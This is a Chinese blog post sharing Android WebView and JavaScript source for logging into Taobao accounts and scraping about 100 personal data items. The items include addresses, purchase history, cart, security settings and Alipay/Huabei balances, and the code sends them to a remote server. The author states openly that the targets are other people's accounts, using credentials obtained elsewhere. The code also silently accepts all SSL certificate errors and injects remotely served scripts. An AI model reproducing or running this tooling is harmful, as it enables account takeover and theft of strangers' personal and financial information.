安卓sdk webview获取淘宝个人信息100项,源码。
1、贴出主要代码。这个不是python,python只涉及服务端对信息提取结果的接收。主体是java + android + js。由于淘宝各模块分布在不同的二级子域名下,而ajax不能跨域,无法只在一个页面内完成所有请求,因此需要依次加载不同的页面。以下是主要部分。js内容由服务端分发。
这样做的好处是:即使不使用微服务,单台机器也能满足1000个用户在同一分钟内提交账号密码请求登录,既降低了后台编写的复杂度,也减小了服务器压力。密码、验证码的校验也更及时。
2、不是爬自己的信息,是获取别人 任意账号 + 密码的淘宝个人信息,如果是为了拿到自己的信息,搞这么多七七八八的那是闲的蛋疼。具体账号 密码是哪来的,置顶第一篇有介绍。
package com.touna.crawlmodule; import android.graphics.Bitmap; import android.net.http.SslError; import android.support.v7.app.AppCompatActivity; import android.os.Bundle; import android.util.Log; import android.view.View; import android.webkit.CookieManager; import android.webkit.JavascriptInterface; import android.webkit.SslErrorHandler; import android.webkit.ValueCallback; import android.webkit.WebChromeClient; import android.webkit.WebSettings; import android.webkit.WebView; import android.webkit.WebViewClient; import org.json.JSONObject; import com.xx.httprequest.CrawlResultSender; import com.xx.view.LogUtil; import com.xx.view.ViewUtil; import com.xx.view.WebViewTimer; public class TaobaoActivity extends AppCompatActivity { private static final String TAG = "MainActivity"; private static final String LOGINPAGEURL = "https://login.m.taobao.com/login.htm";//移动端登陆页面 private static final String MOBILEINDEXPAGEURL = "http://h5.m.taobao.com/mlapp/mytaobao.html";//移动端淘宝个人用户首页 private static final String PCINDEXPAGEURL = "https://www.taobao.com/"; private static final String BINDPAGEURL = "http://member1.taobao.com/member/fresh/account_management.htm"; private static final String COLLECTIONURL = "https://shoucang.taobao.com/nodejs/item_collect_chunk.htm";//收藏页面url private static final String ADDRESSURL = "https://member1.taobao.com/member/fresh/deliver_address.htm";//收货地址url private static final String MYPATHURL = "https://lu.taobao.com/newMyPath.htm";//我的足迹url private static final String BOUGHTSHOPSURL = "https://favorite.taobao.com/list_bought_shops_n.htm";//已经购买的店铺 private static final String BOUGHTITEMSURL = "https://buyertrade.taobao.com/trade/itemlist/list_bought_items.htm";//已经购买的物品 private static final String SHOPCARTURL = "https://cart.taobao.com/cart.htm";//购物车URL private static final String SAFESETTINGURL = "http://member1.taobao.com/member/fresh/certify_info.htm";//安全信息设置 private static final String TRADEINFOURL = 
"http://member1.taobao.com/member/fresh/account_profile.htm";//交易信息url private static final String PERSONALINFOURL = "https://i.taobao.com/user/baseInfoSet.htm";//个人资料url private static final String POINTSURL = "https://pages.tmall.com/wow/jifen/act/point-details";//积分URL private static final String WEIBOURL = "http://member1.taobao.com/member/fresh/weibo_bind_management.htm";//绑定微博URL private static final String REFUSEURL = "https://refund2.tmall.com/dispute/buyerDisputeList.htm?type=1&disputeType=1";//退货管理URL private static final String HUABEIURL = "https://i.taobao.com/my_taobao.htm";//支付宝余额和花呗额度 private JSONObject dataJson=new JSONObject(); @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_taobo); startWebView(); } private void startWebView() { WebView webView = findViewById(R.id.taobaoView); final WebSettings settings = webView.getSettings(); settings.setUseWideViewPort(true); settings.setLayoutAlgorithm(WebSettings.LayoutAlgorithm.NARROW_COLUMNS); settings.setLoadWithOverviewMode(true); settings.setJavaScriptEnabled(true); webView.addJavascriptInterface(new JsInterface(), "JsInterface"); settings.setJavaScriptEnabled(true); settings.setLoadWithOverviewMode(true); settings.setSupportZoom(true); settings.setDomStorageEnabled(true); settings.setCacheMode(WebSettings.LOAD_NO_CACHE); settings.setAllowFileAccess(true); settings.setUseWideViewPort(true); settings.setSupportMultipleWindows(true); settings.setLoadsImagesAutomatically(true); //settings.setBlockNetworkImage(false); settings.setDefaultTextEncodingName("GBK"); webView.setVerticalScrollBarEnabled(true); webView.setHorizontalScrollBarEnabled(true); settings.setUserAgentString("Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"); webView.setWebChromeClient(new WebChromeClient()); startWebViewClient(webView); webView.loadUrl(LOGINPAGEURL); } /** * @param view 
WebView对象 * 初始化webviewClient */ private void startWebViewClient(WebView view) { view.setWebViewClient(new WebViewClient() { @Override public void onReceivedSslError(WebView view, SslErrorHandler handler, SslError error) { handler.proceed(); } @Override public void onPageStarted(final WebView view, String url, Bitmap favicon) { Log.e(TAG, "onPageStarted: " + url); if (url.contains(LOGINPAGEURL)){ view.setVisibility(View.GONE); } } /** * @param view 浏览器对象 * @param url 浏览器地址 */ @Override public void onPageFinished(final WebView view, String url) { Log.e(TAG, "onPageFinished: " + url); if (url.contains(LOGINPAGEURL)) { ViewUtil.injectScriptFile(view, "loginPage/taobaoInit.js"); view.loadUrl("javascript:initLoginPage()"); new WebViewTimer(view, 300){ @Override public void operateView(){ view.setVisibility(View.VISIBLE); } }; } if (url.contains(MOBILEINDEXPAGEURL)) { //view.getSettings().setUserAgentString("Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"); ViewUtil.setNoImage(view); //关闭图片 view.loadUrl(PCINDEXPAGEURL); } if (PCINDEXPAGEURL.equals(url)) { view.loadUrl(REFUSEURL); } if (url.contains(REFUSEURL)) { ViewUtil.injectScriptFile(view, "jquery.min.js"); //此处需要jquery! 
ViewUtil.injectScriptFromInternet(view, "taobao/refund.js"); view.loadUrl("javascript:window.JsInterface.getReturnString(extractRefund());"); view.loadUrl(POINTSURL); } if (url.contains(POINTSURL)) { Log.e(TAG, "onPageFinished: inject"); ViewUtil.injectScriptFromInternet(view, "taobao/point.js"); view.loadUrl("javascript:window.JsInterface.getReturnString(extractPoint());"); view.loadUrl(PERSONALINFOURL); } if (url.contains(PERSONALINFOURL)) { ViewUtil.injectScriptFromInternet(view, "taobao/personalInformation.js"); view.loadUrl("javascript:window.JsInterface.getReturnString(extractPersonalInformation());"); view.loadUrl(COLLECTIONURL); } if (url.contains(COLLECTIONURL)) { ViewUtil.injectScriptFromInternet(view, "taobao/collect.js"); view.loadUrl("javascript:window.JsInterface.getReturnString(extractCollect());"); view.loadUrl(ADDRESSURL); } if (url.contains(ADDRESSURL)) { ViewUtil.injectScriptFromInternet(view, "taobao/delivery.js"); view.loadUrl("javascript:window.JsInterface.getReturnString(extractDelivery());"); view.loadUrl(MYPATHURL); } if (url.contains(MYPATHURL)) { ViewUtil.injectScriptFromInternet(view, "taobao/footprint.js"); view.loadUrl("javascript:window.JsInterface.getReturnString(extractFootprint());"); view.loadUrl(BOUGHTSHOPSURL); } if (url.contains(BOUGHTSHOPSURL)) { ViewUtil.injectScriptFromInternet(view, "taobao/havaboughtStore.js"); view.loadUrl("javascript:window.JsInterface.getReturnString(extractHaveBoughtStore());"); view.loadUrl(BOUGHTITEMSURL); } if (url.contains(BOUGHTITEMSURL)) { ViewUtil.injectScriptFromInternet(view, "taobao/havebought.js"); view.loadUrl("javascript:window.JsInterface.getReturnString(extractHaveBought());"); view.loadUrl(SHOPCARTURL); } if (url.contains(SHOPCARTURL)) { ViewUtil.injectScriptFromInternet(view, "taobao/shoppingCart.js"); view.loadUrl("javascript:window.JsInterface.getReturnString(extractShoppingCart());"); view.loadUrl(SAFESETTINGURL); } if (url.contains(SAFESETTINGURL)) { 
ViewUtil.injectScriptFromInternet(view, "taobao/safeSettings.js"); view.loadUrl("javascript:window.JsInterface.getReturnString(extractSafeSettings());"); view.loadUrl(TRADEINFOURL); } if (url.contains(TRADEINFOURL)) { ViewUtil.injectScriptFromInternet(view, "taobao/tradeInfo.js"); view.loadUrl("javascript:window.JsInterface.getReturnString(extractTradeInfo());"); view.loadUrl(WEIBOURL); } if (url.contains(WEIBOURL)) { ViewUtil.injectScriptFromInternet(view, "taobao/weibo.js"); view.loadUrl("javascript:window.JsInterface.getReturnString(extractWeibo());"); view.loadUrl(BINDPAGEURL); } if (url.contains(BINDPAGEURL)) { ViewUtil.injectScriptFromInternet(view, "taobao/alipayBinding.js"); view.loadUrl("javascript:window.JsInterface.getReturnString(extractAlipay());"); view.loadUrl(HUABEIURL); } if (url.contains(HUABEIURL)) { ViewUtil.injectScriptFromInternet(view, "taobao/huabei.js"); view.loadUrl("javascript:clickHuabei1()"); new WebViewTimer(view, 2000){ @Override public void operateView(){ view.loadUrl("javascript:clickHuabei2()"); } }; new WebViewTimer(view, 4000){ @Override public void operateView(){ view.evaluateJavascript("extractHuabei()", new ValueCallback<String>() { @Override public void onReceiveValue(String s) { Log.e(TAG, "onReceiveValue: "+s ); String jsonStr = ViewUtil.getStrLikeJson(s); ViewUtil.reconsituteJSon(jsonStr, dataJson); ViewUtil.showLargeLog(dataJson.toString()); CrawlResultSender.sendToweb("taobao", dataJson.toString()); } }); } }; } } }); } class JsInterface { private static final String TAG = "JSInterface"; @JavascriptInterface public void getReturnString(String returnValue) throws Exception{ Log.e(TAG,"当前项返回值是: " + returnValue); ViewUtil.reconsituteJSon(returnValue,dataJson); } } }
贴出其中一个js实例,例如提取用户所收藏的物品。这里不是直接翻页,而是使用ajax以提升效率,且ajax必须使用同步方式。由于此接口返回的是页面(HTML)而不是json,可以用css选择器提取。
/**
 * Created by ㄟ(▔=▔)ㄏ on 2018/1/5.
 */
/*
 * https://shoucang.taobao.com/nodejs/item_collect_chunk.htm?ifAllTag=0&tab=0&tagId=&categoryCount=0&type=0&tagName=&categoryName=&needNav=false&startRow=0
 * Extracts the items in the favourites list.
 */

/**
 * Minimal XMLHttpRequest wrapper.
 *
 * @param {Object}  [opt]
 * @param {string}  [opt.type='POST']  HTTP method; only POST and GET are sent.
 * @param {string}  [opt.url='']       Target URL; may already carry a query string.
 * @param {boolean} [opt.async=false]  Asynchronous flag passed to open().
 * @param {Object}  [opt.data]         Key/value pairs, URL-encoded into the
 *                                     body (POST) or the query string (GET).
 * @returns {XMLHttpRequest} The request object. For a synchronous request it
 *          is already complete, so the caller can read responseText directly.
 *          opt.success is accepted for compatibility but is not invoked.
 */
function myajax(opt) {
    opt = opt || {};
    // Default first, then upper-case: calling toUpperCase() on a missing type throws.
    var method = (opt.type || 'POST').toUpperCase();
    var url = opt.url || '';
    var isAsync = opt.async || false;
    var data = opt.data || null;

    // typeof probe: a bare reference to an undeclared global would throw.
    var xmlHttp = (typeof XMLHttpRequest !== 'undefined')
        ? new XMLHttpRequest()
        : new ActiveXObject('Microsoft.XMLHTTP');

    var params = [];
    for (var key in data) {
        if (Object.prototype.hasOwnProperty.call(data, key)) {
            params.push(encodeURIComponent(key) + '=' + encodeURIComponent(data[key]));
        }
    }
    var query = params.join('&');

    if (method === 'POST') {
        xmlHttp.open(method, url, isAsync);
        xmlHttp.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded;charset=utf-8');
        xmlHttp.send(query);
    } else if (method === 'GET') {
        if (query) {
            // Extend an existing query string with '&' instead of adding a second '?'.
            url += (url.indexOf('?') === -1 ? '?' : '&') + query;
        }
        xmlHttp.open(method, url, isAsync);
        xmlHttp.send(null);
    }
    return xmlHttp;
}


/**
 * Collects the favourited items by requesting the list chunk by chunk with
 * synchronous GETs and parsing each returned HTML fragment.
 *
 * @returns {string} JSON text of the form {"collectInfo":[{collectName, collectUrl, collectPrice}, ...]}
 */
function extractCollect() {
    var PAGE_SIZE = 30;       // items per chunk
    var LAST_PAGE_INDEX = 3;  // pages 0..3: the first page plus at most three more
    var BASE_URL = 'https://shoucang.taobao.com/nodejs/item_collect_chunk.htm?ifAllTag=0&tab=0&tagId=&categoryCount=0&type=0&tagName=&categoryName=&needNav=false&startRow=';

    var collectList = [];
    var parser = new DOMParser();

    for (var page = 0; page <= LAST_PAGE_INDEX; page++) {
        console.debug("当前是第 " + page + "页");
        var url = BASE_URL + (page * PAGE_SIZE);
        var htmlStr = myajax({
            type: 'GET',
            url: url,
            async: false
        }).responseText || '';

        // No list items in the response means there is nothing further to page through.
        if (htmlStr.indexOf("J_FavListItem") === -1) {
            break;
        }

        // Parse the fetched chunk itself; querying the live document would
        // return the same on-screen items for every page.
        var chunk = parser.parseFromString(htmlStr, 'text/html');
        var items = chunk.querySelectorAll('li.J_FavListItem');
        for (var i = 0; i < items.length; i++) {
            var link = items[i].querySelector('a.img-item-title-link');
            var priceElement = items[i].querySelector('.g_price strong');
            var collectObj = {
                'collectName': link ? link.title : '',
                'collectUrl': link ? link.href : '',
                // A missing price element means the item is no longer available.
                'collectPrice': priceElement ? priceElement.textContent.trim() : "宝贝已失效"
            };
            console.info(collectObj);
            collectList.push(collectObj);
        }
        console.info(url);
    }

    return '{"collectInfo":' + JSON.stringify(collectList) + '}';
}

//extractCollect();
这就是唯一登录淘宝获取信息的方法,不管是什么语言java py,不管是用httpclient urlconnection还是urllib requests 想达到 本篇的目的,可能性为0。不服不信的可以用httpclient urllib试试,光是一个接口登录淘宝,网上就在悬赏5万人民币了,就不说提取信息了,单是把这个接口登录淘宝解决,相当于几个月的工资了。
反对极端面向过程编程思维方式,喜欢面向对象和设计模式的解读,喜欢对比极端面向过程编程和oop编程消耗代码行数的区别和原因。致力于使用oop和36种设计模式写出最高可复用的框架级代码和使用最少的代码行数完成任务,致力于使用oop和设计模式来使部分代码减少90%行,使绝大部分py文件最低减少50%-80%行的写法。